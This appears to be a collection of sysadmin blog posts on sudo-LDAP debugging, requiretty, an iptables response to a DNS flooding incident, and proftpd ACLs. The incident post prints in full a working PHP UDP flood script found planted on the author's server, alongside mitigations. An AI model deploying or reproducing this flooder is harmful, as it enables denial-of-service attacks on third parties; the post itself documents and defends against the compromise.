sudoers_debug setting to 1 will show moderate debugging, setting to 2 will show the results of the matches themselves. For example, if you have set sudoers_debug to 2 and when you execute sudoCommand, info you'll get will like the following:

$ sudo -i
LDAP Config Summary
===================
uri ldaps://testLdapServer/
ldap_version 3
sudoers_base ou=SUDOers,dc=doxer,dc=org
binddn cn=proxyAgent,ou=profile,dc=doxer,dc=org
bindpw password
bind_timelimit 120000
timelimit 120
ssl on
tls_cacertdir /etc/openldap/cacerts
===================
sudo: ldap_initialize(ld, ldaps://testLdapServer/)
sudo: ldap_set_option: debug -> 0
sudo: ldap_set_option: ldap_version -> 3
sudo: ldap_set_option: tls_cacertdir -> /etc/openldap/cacerts
sudo: ldap_set_option: timelimit -> 120
sudo: ldap_set_option(LDAP_OPT_NETWORK_TIMEOUT, 120)
sudo: ldap_set_option(LDAP_OPT_X_TLS, LDAP_OPT_X_TLS_HARD)
sudo: ldap_simple_bind_s() ok
sudo: found:cn=defaults,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoOption: 'ignore_local_sudoers'
sudo: ldap search '(|(sudoUser=liandy)(sudoUser=%linuxsupport)(sudoUser=%linux)(sudoUser=ALL))'
sudo: found:cn=LDAPpwchange,ou=sudoers,dc=doxer,dc=org
sudo: ldap sudoHost 'server01' ... not
sudo: ldap sudoHost 'server02' ... not
sudo: ldap search 'sudoUser=+*'
sudo: found:cn=test-su,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoUser netgroup '+sysadmin-ng' ... not
sudo: found:cn=dba-su,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoUser netgroup '+dba-ng' ... not
sudo: ldap sudoUser netgroup 'test01' ... not
sudo: ldap sudoUser netgroup 'test02' ... not
sudo: found:cn=Linux-Team-root,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoUser netgroup '+linuxadmins' ... MATCH!
sudo: ldap sudoHost 'ALL' ... MATCH!
sudo: ldap sudoorgmand 'ALL' ... MATCH!
sudo: Perfect Matched!
sudo: ldap sudoOption: '!authenticate'
sudo: user_matches=-1
sudo: host_matches=-1
sudo: sudo_ldap_check(0)=0x422

So from above debugging outputs, you'll know that the account to be sudo authenticated belongs to linuxadmins netgroup and this netgroup is in the sudoUser's scope of Linux-Team-root SUDOers. As Linux-Team-root has sudoCommand for "ALL" and sudoHost for "ALL" and also has sudoOption "!authenticate", then the user will successfully get root access with no password prompt.

Now let's go through a failed authentication to see the debugging information:

$ sudo hastatus -sum
LDAP Config Summary
===================
host testLdapServer
port 389
ldap_version 3
sudoers_base ou=SUDOers,dc=doxer,dc=org
binddn (anonymous)
bindpw (anonymous)
===================
ldap_init(testLdapServer,389)
ldap_set_option(LDAP_OPT_PROTOCOL_VERSION,0x03)
ldap_bind() ok
found:cn=defaults,ou=SUDOers,dc=doxer,dc=org
ldap sudoOption: 'ignore_local_sudoers'
ldap search '(|(sudoUser=liandy)(sudoUser=%normaluser)(sudoUser=%normaluser)(sudoUser=%patop)(sudoUser=ALL))'
ldap search 'sudoUser=+*'
found:cn=test-su,ou=SUDOers,dc=doxer,dc=org
ldap sudoUser netgroup '+sysadmin-ng' ... not
found:cn=tstwas-su,ou=SUDOers,dc=doxer,dc=org
ldap sudoUser netgroup '+linux-team-ng' ... not
found:cn=normal-su,ou=SUDOers,dc=doxer,dc=org
ldap sudoUser netgroup '+normaluser-ng' ... MATCH!
ldap sudoHost 'all' ... MATCH!
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -start' ... not
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -status' ... not
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -stop' ... not
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -kill' ... not
user_matches=-1
host_matches=-1
sudo_ldap_check(0)=0x04
Password:

From here we can see that although the user to be authenticated is in "normal-su" SUDOers, and the host is in it's sudoHost, but as there's no "hastatus -sum" defined for sudoCommand, so at last the authentication failed(user_matches=-1, host_matches=-1) and prompts for sudo password.

requiretty in sudoers file will break functioning of accounts without tty

May 2nd, 2012 Comments off

Intercepted from /etc/sudoers:

Defaults requiretty

#
# Refuse to run if unable to disable echo on the tty. This setting should also be
# changed in order to be able to use sudo without a tty. See requiretty above.
#

This means that if you have created an account without a tty for it, and you want that user have the privileges to some sudo commands, this setting(Defaults requiretty) will make the account not able to execute these wanted sudo commands.

To fix this, you can do the following:

  1. disable "Defaults requiretty" in /etc/sudoers file
  2. Change nsswitch.conf to be ldap files rather than files ldap
  3. Better yet don’t enable local sudoers

resolved – port 53 dns flooding attack

April 13th, 2012 Comments off

I found this port 53 dns flooding attack when the server became very unsteady. NIC was blipping and networking just went down without OS rebooting.

Using ntop as detector, I found the issue with DNS traffic was at a very high level(about 3Gb traffic). Then I determined to forbid DNS traffic, and only allow some usual ports.

  • Disable autoboot of iptables in case there's something wrong with iptables

 

mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables

 

  • here's the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F

#Note that DROP is different than REJECT. REJECT will return error to client(telnet will return Connection refused from client), but DROP will just drop the packet(telnet will hang Trying and return Connection timed out).
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - if there's no -m, than --dport or --sport must be in a range
#todo - --ports source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp(Simple File Transfer Protocol, not SSH File Transfer Protocol<use SSH port>. )
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow outgoing ssh
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping & nslookup. reply is 8, request is 0
#allow other hosts to ping
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, dns traffic now dropped to normal status.

NB:

After several days' investigation, I finally found out that this attack was source from some worms(php worms?) embedded in dedecms's directory. Here's one file called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

This is crazy! That explains the reason why there was so much DNS traffic out!

To cure this weakness:

1.disable fsockopen function in php.ini

disable_functions = fsockopen

2.in .htaccess file, limit php scripts from running

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ - [F]
RewriteRule data/(.*).(php)$ - [F]
RewriteRule templets/(.*).(php)$ - [F]

Add user account in proftpd server(Privileges through setfacl &getfacl)

August 27th, 2010 Comments off

After you've installed proftpd in centos or debian,add user account is the next step.Use groupadd and useradd command,and passwd to set a password,the new user is then ready to use ftp to log in the home directory(set home directory by 'useradd -d').
But sometimes,things are not that simple.Now you want the ftp user have specified privileges on some directories,and you are not allowed to change the old mod(for example,directories under /var/www/htdocs).If you encounter this,time for you to use acl(Access Control List) module of linux.
Here is the detailed steps:
groupadd test
useradd -g test -d /var/www/virtual -s /sbin/nologin test #-s /sbin/nologin disallow user to log in the system
passwd test
setfacl -m u:test:rwx /var/www/virtual #test now have mod rwx
getfacl /var/www/virtual

#In /etc/rc.local,type in setfacl -m u:test:rwx /var/www/virtual to run the command at boot time

#If you find no command setfacl,getfacl on your system,use yum install acl(centos),apt-get install acl(debian,ubuntu) to firstly install them.

PS:

You can read more about ACL in linux here https://wiki.archlinux.org/index.php/Access_Control_Lists